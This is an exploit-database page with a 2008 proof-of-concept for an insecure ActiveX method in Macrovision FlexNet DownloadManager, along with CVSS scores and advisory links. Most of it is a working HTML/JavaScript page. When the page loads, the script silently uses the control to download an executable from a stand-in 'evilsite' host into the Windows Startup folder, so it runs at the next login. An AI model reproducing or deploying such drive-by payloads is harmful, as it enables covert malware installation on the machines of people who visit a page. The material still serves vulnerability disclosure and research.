Macrovision FlexNet DownloadManager Insecure Methods Exploit

2008.10.18
Credit: e.b.
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Macrovision FlexNet DownloadManager Insecure Methods Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372 --> <html> <head> <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title> <script language="JavaScript" defer> function Check() { var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}"); mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe"); mJob.SetPriority(0); mJob.SetNotifyFlags(2); mJob.ScheduleInterval = 2; obj.RunScheduledJobs(); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0"> Unable to create object </object> </body> </html>

References:

http://xforce.iss.net/xforce/xfdb/39653
http://www.securityfocus.com/bid/27279
http://www.milw0rm.com/exploits/4909
http://secunia.com/advisories/28496


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top